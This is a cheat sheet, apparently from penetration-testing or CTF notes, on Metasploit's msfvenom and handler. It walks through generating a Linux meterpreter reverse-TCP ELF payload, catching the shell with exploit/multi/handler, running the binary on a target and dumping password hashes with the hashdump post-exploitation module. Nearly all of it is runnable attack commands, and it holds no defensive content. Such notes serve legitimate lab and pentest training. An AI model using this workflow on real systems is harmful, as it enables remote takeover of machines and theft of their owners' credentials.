Msfvenom
Help menu
$ msfvenom -h
List available options for module type
$ msfvenom -l payloads
$ msfvenom -l encoders
$ msfvenom -l nops
$ msfvenom -l all
Payload option
$ msfvenom -p ...
# eg.
$ msfvenom -p linux/x86/shell_reverse_tcp
Format option
$ msfvenom -f ...
# eg.
$ msfvenom -f elf
$ msfvenom -f exe
Note: The output from msfvenom provides the shellcode (typically written in assembly language) that can be executed on the target architecture; defined by the -p
flag. The -f
flag simply specifies the format for which the shellcode should be in.
Eg. Powershell
[Byte[]] $buf = 0xfc,0x48,0x83,...
Eg. C
unsigned char buf[] = "\xfc\x48\x83...
Eg. Python
buf = b""
buf += b"\xfc\x48\x8
buf += b"\...
A script/program (in the specific language) which executes the shellcode provided by msfvenom is still required to be created.
Example
linux/x86/meterpreter/reverse_tcp
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.xxx.xxx LPORT=8000 -f elf > shell.elf
Module to use on the attacking machine to catch a shell
exploit/multi/handler
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport xxxx
msf6 exploit(multi/handler) > run
Run the shellcode on the target machine
# eg.
$ sudo ./shell.elf
Gain meterpreter shell on the attacker machine
meterpreter >
Using post exploitation hash dump module
meterpreter > background
msf6 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux ... ...
msf6 exploit(multi/handler) > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > show options
msf6 post(linux/gather/hashdump) > set session 1
msf6 post(linux/gather/hashdump) > run
...
Last updated